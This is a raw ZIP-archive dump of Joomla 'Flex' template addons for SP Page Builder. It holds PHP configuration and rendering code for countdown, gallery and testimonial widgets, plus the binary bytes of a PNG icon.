			#sppb-addon-{{ data.id }} .sppb-countdown-number, #sppb-addon-{{ data.id }} .sppb-countdown-finishedtext {
				<# if(_.isObject(data.counter_height)){ #>
					height: {{ data.counter_height.md }}px;
					line-height: {{ data.counter_height.md }}px;
				<# } else { #>
					height: {{ data.counter_height }}px;
					line-height: {{ data.counter_height }}px;
				<# } #>

				<# if(_.isObject(data.counter_width)){ #>
					width: {{ data.counter_width.md }}px;
				<# } else { #>
					width: {{ data.counter_width }}px;
				<# } #>
				
				<# if(_.isObject(data.counter_font_size)){ #>
					font-size: {{ data.counter_font_size.md }}px;
				<# } else { #>
					font-size: {{ data.counter_font_size }}px;
				<# } #>
				color: {{ data.counter_text_color }};
				background-color: {{ data.counter_background_color }};
				

				<# if(_.isObject(data.counter_border_radius)){ #>
					border-radius: {{ data.counter_border_radius.md }}px;
				<# } else { #>
					border-radius: {{ data.counter_border_radius }}px;
				<# } #>

				<# if(data.counter_user_border){ #>
					<# if(_.isObject(data.counter_border_width)){ #>
						border-width: {{ data.counter_border_width.md }}px;
					<# } else { #>
						border-width: {{ data.counter_border_width }}px;
					<# } #>
					
					border-style: {{ data.counter_border_style }};
					border-color: {{ data.counter_border_color }};
				<# } #>
			}
			#sppb-addon-{{ data.id }} .sppb-countdown-text {
				<# if(_.isObject(data.label_font_size)){ #>
					font-size: {{ data.label_font_size.md }}px;
				<# } else { #>
					font-size: {{ data.label_font_size }}px;
				<# } #>
				color: {{ data.label_color }};
			}

			@media (min-width: 768px) and (max-width: 991px) {
				#sppb-addon-{{ data.id }} .sppb-countdown-number, #sppb-addon-{{ data.id }} .sppb-countdown-finishedtext {
					<# if(_.isObject(data.counter_height)){ #>
						height: {{ data.counter_height.sm }}px;
						line-height: {{ data.counter_height.sm }}px;
					<# } #>
	
					<# if(_.isObject(data.counter_width)){ #>
						width: {{ data.counter_width.sm }}px;
					<# } #>
					
					<# if(_.isObject(data.counter_font_size)){ #>
						font-size: {{ data.counter_font_size.sm }}px;
					<# } #>
					
	
					<# if(_.isObject(data.counter_border_radius)){ #>
						border-radius: {{ data.counter_border_radius.sm }}px;
					<# } #>
	
					<# if(data.counter_user_border){ #>
						<# if(_.isObject(data.counter_border_width)){ #>
							border-width: {{ data.counter_border_width.sm }}px;
						<# } #>
					<# } #>
				}
				#sppb-addon-{{ data.id }} .sppb-countdown-text {
					<# if(_.isObject(data.label_font_size)){ #>
						font-size: {{ data.label_font_size.sm }}px;
					<# } #>
				}
			}
			@media (max-width: 767px) {
				#sppb-addon-{{ data.id }} .sppb-countdown-number, #sppb-addon-{{ data.id }} .sppb-countdown-finishedtext {
					<# if(_.isObject(data.counter_height)){ #>
						height: {{ data.counter_height.xs }}px;
						line-height: {{ data.counter_height.xs }}px;
					<# } #>
	
					<# if(_.isObject(data.counter_width)){ #>
						width: {{ data.counter_width.xs }}px;
					<# } #>
					
					<# if(_.isObject(data.counter_font_size)){ #>
						font-size: {{ data.counter_font_size.xs }}px;
					<# } #>
					
	
					<# if(_.isObject(data.counter_border_radius)){ #>
						border-radius: {{ data.counter_border_radius.xs }}px;
					<# } #>
	
					<# if(data.counter_user_border){ #>
						<# if(_.isObject(data.counter_border_width)){ #>
							border-width: {{ data.counter_border_width.xs }}px;
						<# } #>
					<# } #>
				}
				#sppb-addon-{{ data.id }} .sppb-countdown-text {
					<# if(_.isObject(data.label_font_size)){ #>
						font-size: {{ data.label_font_size.xs }}px;
					<# } #>
				}
			}
		</style>
		<div class="sppb-addon sppb-addon-countdown {{ data.class }}">
			<div class="countdown-text-wrap">
				<# if( !_.isEmpty( data.title ) ){ #><{{ data.heading_selector }} class="sppb-addon-title">{{ data.title }}</{{ data.heading_selector }}><# } #>
			</div>
			<div class="sppb-countdown-timer sppb-row" data-date="{{ data.date }}" data-time="{{ data.time }}" data-finish-text="{{ data.finish_text }}"></div>
		</div>
		';

		return $output;
	}

}
PK!��--+flex/sppagebuilder/addons/gallery/admin.phpnu&1i�<?php
/**
 * Flex @package SP Page Builder
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2020 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
// no direct access
defined ('_JEXEC') or die ('Restricted access');

SpAddonsConfig::addonConfig(
	array(
		'type'=>'repeatable',
		'addon_name'=>'sp_gallery',
		'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GALLERY'),
		'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GALLERY_DESC'),
		'category'=>'Media',
		'attr'=>array(
			'general' => array(

				'admin_label'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_ADMIN_LABEL'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_ADMIN_LABEL_DESC'),
					'std'=> ''
				),

				'title'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_DESC'),
					'std'=>  ''
				),

				'heading_selector'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_DESC'),
					'values'=>array(
						'h1'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H1'),
						'h2'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H2'),
						'h3'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H3'),
						'h4'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H4'),
						'h5'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H5'),
						'h6'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H6'),
					),
					'std'=>'h3',
					'depends'=>array(array('title', '!=', '')),
				),

				'title_font_family'=>array(
					'type'=>'fonts',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_FAMILY'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_FAMILY_DESC'),
					'depends'=>array(array('title', '!=', '')),
					'selector'=> array(
						'type'=>'font',
						'font'=>'{{ VALUE }}',
						'css'=>'.sppb-addon-title { font-family: "{{ VALUE }}"; }'
					)
				),

				'title_fontsize'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_SIZE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_SIZE_DESC'),
					'std'=>'',
					'depends'=>array(array('title', '!=', '')),
					'responsive' => true,
					'max'=> 400,
				),

				'title_lineheight'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_LINE_HEIGHT'),
					'std'=>'',
					'depends'=>array(array('title', '!=', '')),
					'responsive' => true,
					'max'=> 400,
				),

				'title_font_style'=>array(
					'type'=>'fontstyle',
					'title'=> JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_STYLE'),
					'depends'=>array(array('title', '!=', '')),
				),

				'title_letterspace'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LETTER_SPACING'),
					'values'=>array(
						'0'=> 'Default',
						'1px'=> '1px',
						'2px'=> '2px',
						'3px'=> '3px',
						'4px'=> '4px',
						'5px'=> '5px',
						'6px'=>	'6px',
						'7px'=>	'7px',
						'8px'=>	'8px',
						'9px'=>	'9px',
						'10px'=> '10px'
					),
					'std'=>'0',
					'depends'=>array(array('title', '!=', '')),
				),

				'title_text_color'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_TEXT_COLOR'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_TEXT_COLOR_DESC'),
					'depends'=>array(array('title', '!=', '')),
				),

				'title_margin_top'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_TOP'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_TOP_DESC'),
					'placeholder'=>'10',
					'depends'=>array(array('title', '!=', '')),
					'responsive' => true,
					'max'=> 400,
				),

				'title_margin_bottom'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_BOTTOM'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_BOTTOM_DESC'),
					'placeholder'=>'10',
					'depends'=>array(array('title', '!=', '')),
					'responsive' => true,
					'max'=> 400,
				),

				'class'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CLASS'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_CLASS_DESC'),
					'std'=>''
				),

				'width'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GALLERY_IMAGE_WIDTH'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GALLERY_IMAGE_WIDTH_DESC'),
                    'responsive' => true,
                    'std'=>array('md'=>200),
					'max'=>1000
				),

				/*
				'height'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GALLERY_IMAGE_HEIGHT'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GALLERY_IMAGE_HEIGHT_DESC'),
					'responsive' => true,
                    'std'=>array('md'=>200),
					'max'=>1000
				),
				*/
				'item_gap'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GALLERY_ITEM_GAP'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GALLERY_ITEM_GAP_DESC'),
					'responsive' => true,
                    'std'=>array('md'=>0),
					'max'=>400
				),
				'item_alignment'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GALLERY_ITEM_ALIGNMENT'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GALLERY_ITEM_ALIGNMENT_DESC'),
					'values'=>array(
						'left'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LEFT'),
						'center'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_CENTER'),
						'right'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_RIGHT'),
					),
                    'std'=>'',
				),
				// Repeatable Items
				'sp_gallery_item'=>array(
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GALLERY_ITEMS'),
					'attr'=>array(
						'title'=>array(
							'type'=>'text',
							'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GALLERY_ITEM_TITLE'),
							'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GALLERY_ITEM_TITLE_DESC'),
							'std'=>'Gallery Item 1'
						),
						'thumb'=>array(
							'type'=>'media',
							'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GALLERY_THUMB'),
							'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GALLERY_THUMB_DESC'),
							'std'=> array(
								'src' => 'https://sppagebuilder.com/addons/gallery/gallery1.jpg',
								'height' => '',
								'width' => '',
							),
						),
						'full'=>array(
							'type'=>'media',
							'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GALLERY_FULL'),
							'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GALLERY_FULL_DESC'),
							'std'=> array(
								'src' => 'https://sppagebuilder.com/addons/gallery/gallery1.jpg',
								'height' => '',
								'width' => '',
							),
						),
					),
				),
			)
		),
	)
);
PK!�y�H*-*-*flex/sppagebuilder/addons/gallery/site.phpnu&1i�<?php
/**
 * Flex @package SP Page Builder
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2020 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
// no direct access
defined ('_JEXEC') or die ('Restricted access');

class SppagebuilderAddonGallery extends SppagebuilderAddons{

	public function render() {
        $settings = $this->addon->settings;
		$class = (isset($settings->class) && $settings->class) ? $settings->class : '';
		$title = (isset($settings->title) && $settings->title) ? $settings->title : '';
		$heading_selector = (isset($settings->heading_selector) && $settings->heading_selector) ? $settings->heading_selector : 'h3';
		$item_alignment = (isset($settings->item_alignment) && $settings->item_alignment) ? $settings->item_alignment : '';

		$output  = '<div class="sppb-addon sppb-addon-gallery ' . $class . '">';
		$output .= ($title) ? '<'.$heading_selector.' class="sppb-addon-title">' . $title . '</'.$heading_selector.'>' : '';
		$output .= '<div class="sppb-addon-content">';
		$output .= '<ul class="sppb-gallery clearfix gallery-item-'.$item_alignment.'">';

		if(isset($settings->sp_gallery_item) && count((array) $settings->sp_gallery_item)){
			foreach ($settings->sp_gallery_item as $key => $value) {
                $thumb_img = isset($value->thumb) && $value->thumb ? $value->thumb : '';
                $thumb_src = isset($thumb_img->src) ? $thumb_img->src : $thumb_img;
                $thumb_width = isset($thumb_img->width) && $thumb_img->width ? $thumb_img->width : '';
                $thumb_height = isset($thumb_img->height) && $thumb_img->height ? $thumb_img->height : '';

                $full_img = isset($value->full) && $value->full ? $value->full : '';
                $full_src = isset($full_img->src) ? $full_img->src : $full_img;

				if($thumb_src) {
                    if(strpos($thumb_src, "http://") !== false || strpos($thumb_src, "https://") !== false){
                        $thumb_src = $thumb_src;
                    } else {
                        $thumb_src = JURI::base(true) . '/' . $thumb_src;
                    }
                    $placeholder = $thumb_src == '' ? false : $this->get_image_placeholder($thumb_src);

					$output .= '<li>';
					$output .= ($full_src) ? '<a href="' . $full_src . '" class="sppb-gallery-btn">' : '';
					$output .= '<img class="sppb-img-responsive'.($placeholder ? ' sppb-element-lazy' : '').'" src="' . ($placeholder ? $placeholder : $thumb_src) . '" alt="' . (isset($value->title) ? $value->title : '') . '" '.($placeholder ? 'data-large="'.$thumb_src.'"' : '').' '.($thumb_width ? 'width="'.$thumb_width.'"' : '').' '.($thumb_height ? 'height="'.$thumb_height.'"' : '').' loading="lazy">';
					$output .= ($full_src) ? '</a>' : '';
					$output .= '</li>';
				}
			}
		}

		$output .= '</ul>';
		$output	.= '</div>';
		$output .= '</div>';

		return $output;
	
	}
	
	public function stylesheets() {
		return array(JURI::base(true) . '/components/com_sppagebuilder/assets/css/magnific-popup.css');
	}

	public function scripts() {
		return array(JURI::base(true) . '/components/com_sppagebuilder/assets/js/jquery.magnific-popup.min.js');
	}

	public function js() {

		$addon_id = '#sppb-addon-' . $this->addon->id;
		$js ='jQuery(function($){
			$("'.$addon_id.' ul li").magnificPopup({
				delegate: ".sppb-gallery-btn",
				type: "image",
				mainClass: "mfp-no-margins mfp-with-zoom",
				gallery:{
					enabled:true
				},
				image: {
					verticalFit: true
				},
				zoom: {
					enabled: true,
					duration: 300
				}
			});
		})';
		$js = preg_replace('/[\n\t]+/m', '', $js); // Remove whitespace
		return $js;
	}
	 
    public function css() {
        $addon_id = '#sppb-addon-' . $this->addon->id;
        $settings = $this->addon->settings;

        $width = (isset($settings->width) && $settings->width) ? $settings->width : '';
        $width_sm = (isset($settings->width_sm) && $settings->width_sm) ? $settings->width_sm : '';
        $width_xs = (isset($settings->width_xs) && $settings->width_xs) ? $settings->width_xs : '';

        /*
		$height = (isset($settings->height) && $settings->height) ? $settings->height : '';
        $height_sm = (isset($settings->height_sm) && $settings->height_sm) ? $settings->height_sm : '';
        $height_xs = (isset($settings->height_xs) && $settings->height_xs) ? $settings->height_xs : '';
		*/
        
        $item_gap = (isset($settings->item_gap) && $settings->item_gap) ? $settings->item_gap : '';
        $item_gap_sm = (isset($settings->item_gap_sm) && $settings->item_gap_sm) ? $settings->item_gap_sm : '';
        $item_gap_xs = (isset($settings->item_gap_xs) && $settings->item_gap_xs) ? $settings->item_gap_xs : '';

        $css = '';
        if($width || $item_gap){
            $css .= $addon_id .' .sppb-gallery img {';
            $css .= 'width:'.$width.'px;';
            //$css .= 'height:'.$height.'px;';
            $css .= '}';
            
            if(!empty($item_gap)){
                $css .= $addon_id .' .sppb-gallery li {';
                $css .= 'margin:'.$item_gap.'px;';
                $css .= '}';
                $css .= $addon_id .' .sppb-gallery {';
                $css .= 'margin:-'.$item_gap.'px;';
                $css .= '}';
            }
            
            $css .= '@media (min-width: 768px) and (max-width: 991px) {';

            $css .= $addon_id .' .sppb-gallery img {';
            $css .= 'width:'.$width_sm.'px;';
            //$css .= 'height:'.$height_sm.'px;';
            $css .= '}';
            
            if(!empty($item_gap_sm)){
                $css .= $addon_id .' .sppb-gallery li {';
                $css .= 'margin:'.$item_gap_sm.'px;';
                $css .= '}';
                $css .= $addon_id .' .sppb-gallery {';
                $css .= 'margin:-'.$item_gap_sm.'px;';
                $css .= '}';
            }

            $css .= '}';

            $css .= '@media (max-width: 767px) {';

            $css .= $addon_id .' .sppb-gallery img {';
            $css .= 'width:'.$width_xs.'px;';
            //$css .= 'height:'.$height_xs.'px;';
            $css .= '}';
            
            if(!empty($item_gap_xs)){
                $css .= $addon_id .' .sppb-gallery li {';
                $css .= 'margin:'.$item_gap_xs.'px;';
                $css .= '}';
                $css .= $addon_id .' .sppb-gallery {';
                $css .= 'margin:-'.$item_gap_xs.'px;';
                $css .= '}';
            }

            $css .= '}';
        }
        return $css;
    }


	public static function getTemplate() {
		$output = '
		<style type="text/css">
            #sppb-addon-{{ data.id }} .sppb-gallery img {
                <# if(_.isObject(data.width)){ #>
                    width: {{data.width.md}}px;
                <# } else { #>
                    width: {{data.width}}px;
                <# } #>
                <# if(_.isObject(data.height)){ #>
                    height: {{data.height.md}}px;
                <# } else { #>
                    height: {{data.height}}px;
                <# } #>
            }
            #sppb-addon-{{ data.id }} .sppb-gallery li {
                <# if(_.isObject(data.item_gap)){ #>
                    margin: {{data.item_gap.md}}px;
                <# } else { #>
                    margin: {{data.item_gap}}px;
                <# } #>
            }
            #sppb-addon-{{ data.id }} .sppb-gallery {
                <# if(_.isObject(data.item_gap)){ #>
                    margin: -{{data.item_gap.md}}px;
                <# } else { #>
                    margin: -{{data.item_gap}}px;
                <# } #>
            }
            @media (min-width: 768px) and (max-width: 991px) {
                #sppb-addon-{{ data.id }} .sppb-gallery img {
                    <# if(_.isObject(data.width)){ #>
                        width: {{data.width.sm}}px;
                    <# } #>
                    <# if(_.isObject(data.height)){ #>
                        height: {{data.height.sm}}px;
                    <# } #>
                }
                
                #sppb-addon-{{ data.id }} .sppb-gallery li {
                    <# if(_.isObject(data.item_gap)){ #>
                        margin: {{data.item_gap.sm}}px;
                    <# } #>
                }
                #sppb-addon-{{ data.id }} .sppb-gallery {
                    <# if(_.isObject(data.item_gap)){ #>
                        margin: -{{data.item_gap.sm}}px;
                    <# } #>
                }
            }
            @media (max-width: 767px) {
                #sppb-addon-{{ data.id }} .sppb-gallery img {
                    <# if(_.isObject(data.width)){ #>
                        width: {{data.width.xs}}px;
                    <# } #>
                    <# if(_.isObject(data.height)){ #>
                        height: {{data.height.xs}}px;
                    <# } #>
                }
                
                #sppb-addon-{{ data.id }} .sppb-gallery li {
                    <# if(_.isObject(data.item_gap)){ #>
                        margin: {{data.item_gap.xs}}px;
                    <# } #>
                }
                #sppb-addon-{{ data.id }} .sppb-gallery {
                    <# if(_.isObject(data.item_gap)){ #>
                        margin: -{{data.item_gap.xs}}px;
                    <# } #>
                }
            }
        </style>
		<div class="sppb-addon sppb-addon-gallery {{ data.class }}">
			<# if( !_.isEmpty( data.title ) ){ #><{{ data.heading_selector }} class="sppb-addon-title sp-inline-editable-element" data-id={{data.id}} data-fieldName="title" contenteditable="true">{{ data.title }}</{{ data.heading_selector }}><# } #>
			<div class="sppb-addon-content">
                <ul class="sppb-gallery clearfix gallery-item-{{data.item_alignment}}">
                
                <#
                _.each(data.sp_gallery_item, function (value, key) {
                    var thumbImg = {}
                    var fullImg = {}
                    if (typeof value.thumb !== "undefined" && typeof value.thumb.src !== "undefined") {
                        thumbImg = value.thumb
                    } else {
                        thumbImg = {src: value.thumb}
                    }
                    if (typeof value.full !== "undefined" && typeof value.full.src !== "undefined") {
                        fullImg = value.full
                    } else {
                        fullImg = {src: value.full}
                    }
					if(thumbImg.src) {
                #>
						<li>
						<# if(fullImg.src && fullImg.src.indexOf("http://") == -1 && fullImg.src.indexOf("https://") == -1){ #>
							<a href=\'{{ pagebuilder_base + fullImg.src }}\' class="sppb-gallery-btn">
						<# } else if(fullImg.src){ #>
							<a href=\'{{ fullImg.src }}\' class="sppb-gallery-btn">
                        <# }
                        if(thumbImg.src && thumbImg.src.indexOf("http://") == -1 && thumbImg.src.indexOf("https://") == -1){
                        #>
								<img class="sppb-img-responsive" src=\'{{ pagebuilder_base + thumbImg.src }}\' alt="{{ value.title }}">
							<# } else if(thumbImg.src){ #>
                                <img class="sppb-img-responsive" src=\'{{ thumbImg.src }}\' alt="{{ value.title }}">
							<# } #>
						<# if(fullImg.src){ #>
							</a>
						<# } #>
						</li>
					<# } #>
				<# }); #>
				</ul>
			</div>
		</div>
		';

		return $output;
	}

}
PK!�U	"��3flex/sppagebuilder/addons/testimonialflex/admin.phpnu&1i�<?php
/**
 * Flex @package SP Page Builder
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2018 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
// no direct access
defined ('_JEXEC') or die ('restricted access');

SpAddonsConfig::addonConfig(
	array(
		'type'=>'repeatable',
		'addon_name'=>'sp_testimonialflex',
		'title'=>JText::_('Testimonials Flex'),
		'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TESTIMONIAL_PRO_DESC'),
		'category'=>'Flex',
		'attr'=>array(
			'general' => array(

				'admin_label'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_ADMIN_LABEL'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_ADMIN_LABEL_DESC'),
					'std'=> ''
				),

				'autoplay'=>array(
					'type'=>'checkbox', 
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TESTIMONIAL_PRO_AUTOPLAY'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TESTIMONIAL_PRO_AUTOPLAY_DESC'),
					'values'=>array(
						1=>JText::_('JYES'),
						0=>JText::_('JNO'),
						),
					'std'=>1,
					),
					
				'autoplay_interval'=>array(
					'type'=>'text', 
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_AUTOPLAY_INTERVAL'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_AUTOPLAY_INTERVAL_DESC'),
					'placeholder'=>'5000',
					'std'=>5000
					),	
				

				'arrows'=>array(
					'type'=>'checkbox', 
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TESTIMONIAL_PRO_SHOW_ARROWS'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TESTIMONIAL_PRO_SHOW_ARROWS_DESC'),
					'values'=>array(
						1=>JText::_('JYES'),
						0=>JText::_('JNO'),
						),
					'std'=>1,
				),
				
				'avatar_width'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TESTIMONIAL_CLIENT_AVATAR_WIDTH'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TESTIMONIAL_CLIENT_AVATAR_WIDTH_DESC'),
					'std'=>32,
					'min'=>16,
					'max'=>128
				),


				'class'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CLASS'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_CLASS_DESC'),
					'std'=> ''
				),

				// Repeatable Items
				
				'sp_testimonialflex_item'=>array(
					'title'=>JText::_('Testimonials'),

					'attr'=>array(
						'title'=>array(
							'type'=>'text',
							'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TESTIMONIAL_PRO_ITEM_TITLE'),
							'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TESTIMONIAL_PRO_ITEM_TITLE_DESC'),
							'std'=>'John Doe',
						),

						'avatar'=>array(
							'type'=>'media',
							'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TESTIMONIAL_PRO_CLIENT_IMAGE'),
							'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TESTIMONIAL_PRO_CLIENT_IMAGE_DESC'),
							'std'=>array(
								'src'=>'',
							)
						),
						
						'avatar_style'=>array(
							'type'=>'select', 
							'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TESTIMONIAL_PRO_AVATAR_STYLE'),
							'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TESTIMONIAL_PRO_AVATAR_STYLE_DESC'),
							'values'=>array(
								''=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_STANDARD'),
								'sppb-img-rounded'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_ROUNDED'),
								'sppb-img-circle'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_CIRCLE'),
								),
							'std'=>'sppb-img-rounded',
							),
							
						'avatar_position'=>array(
							'type'=>'select', 
							'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TESTIMONIAL_CLIENT_AVATAR_POSITION'),
							'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TESTIMONIAL_CLIENT_AVATAR_POSITION_DESC'),
							'values' =>array(
								'left'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_LEFT'),
								'center'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_CENTER'),
								'right'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_RIGHT'),
								),
							'std' => 'left'
						),

						'message'=>array(
							'type'=>'editor',
							'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TESTIMONIAL_PRO_ITEM_TEXT'),
							'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TESTIMONIAL_PRO_ITEM_TEXT_DESC'),
							'std'=> 'Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod. Brunch 3 wolf moon tempor, sunt aliqua put a bird on it squid single-origin coffee nulla assumenda shoreditch et.'
						),
						
					'url'=>array(
						'type'=>'text', 
						'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TESTIMONIAL_PRO_CLIENT_URL'),
						'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TESTIMONIAL_PRO_CLIENT_URL_DESC'),
						),
	
					'link_target'=>array(
						'type'=>'select', 
						'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_TARGET'),
						'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_TARGET_DESC'),
						'values'=>array(
							''=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_TARGET_SAME_WINDOW'),
							'_blank'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_TARGET_NEW_WINDOW'),
							),
						),
					),
				),
			),
		),
	)
);
PK!��U���@flex/sppagebuilder/addons/testimonialflex/assets/images/icon.pngnu&1i��PNG


IHDR@@�iq�tEXtSoftwareAdobe ImageReadyq�e<3IDATx��[[lU���tKoi�-U[h/��j�T�T
AI��>�6$�����Al"�� �/�)

T��w6�iK���V�ݝ�9�g����˜��ߜ����������~ݴ�!TK^V��;�:Ik�7<��!��Kd��{��
�I�D{е��,ҵ$��c��'��ԧ
�R� �%:�A�XŠc�>A~P'kcpD#�2���a[!鯀3�H$ѱ�K�D$�!��Ox�`�Z���8�D��O����b�\��s.�I`�YkB����⸐��A2v��G!�z]�C|�~���' 01��ܕ�
��!k�1cQ���s�,��݄y5��e#����M������A� ��a� B�G�Bƒ"�XݍG`�&�u��{7h�i�ً����Y��<�b�l�mRr����g?�/a�Z��%��}|��Kr[H��
ݵ���l���X���2FLK�e=j%�����3<q�A	K`G�0hb�1*&
쵉B�So�S����v�e����ְZ?H6H��8`���8lp�_{�v�����ǀۊ�f^q���.�D�`�䱍���r<�wߠu�ٽ'GF���� ����v�,��5[4��t�E�ŐRv��[��n���:�����q����\	�m���=�pj�+���r�-���=O����qh���9�+!�dIȵ�t(�Z+�v��ȵ�$w\R]�ᾋ]r�5�^3�M_Cu�É+7"
z���?�k
��1�L��5u{m
������8\�폘MԿ(xW�~������Y2K�!鑦�E$����ާ	G]7PJ�ϋX�r�A�y<\IO?O�H��1 �q��8�}2�Ē����{����ט?��d��1#�!��ù!��猱h0f"Ռ�y��m���p�Η��U�{�yٛoZ��(\�鋂cs%hdβƙ�ܹ�P��S��m�׏�	�u��"h|Vb1C��Y%�0]����Sf���oN�h>�1@���J( ڦP�y���D���
}����K�u���P9m�©��
%�1@�����V�4�$�A>�Q]a�50��s#j�L�4��ripL�+.�M�����;0st�a�
Q�+�r4�1�M߯;���Dco������RX���޴��}��z�k���L���a����'r���12Z��)���hDS)܎��!��ڡ��S-���W����Es�R�0�u���(��a>�'�=-r��_�m�j�'VB�K+�%���~��'���S��,{�i)���Oi��o/�)�D՗]��7�MP�M����w�^�S�W�t�@Vx�� ��De��DCp��z=�-e� ��J�
E��VH��G����F�������09�p8zK��l���B��[ı�wV�w�N�ݙ�8��N[,�V��H�ݎdA����C��E�Uc����?}!���~H��c�}�k��ϗ=�Gg�t��3�R�W��Oo�9g��N��K���Ik �{�_�/�/2~H�fIEND�B`�PK!�4�"�"2flex/sppagebuilder/addons/testimonialflex/site.phpnu&1i�<?php
/**
 * Flex @package SP Page Builder
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2018 Aplikko
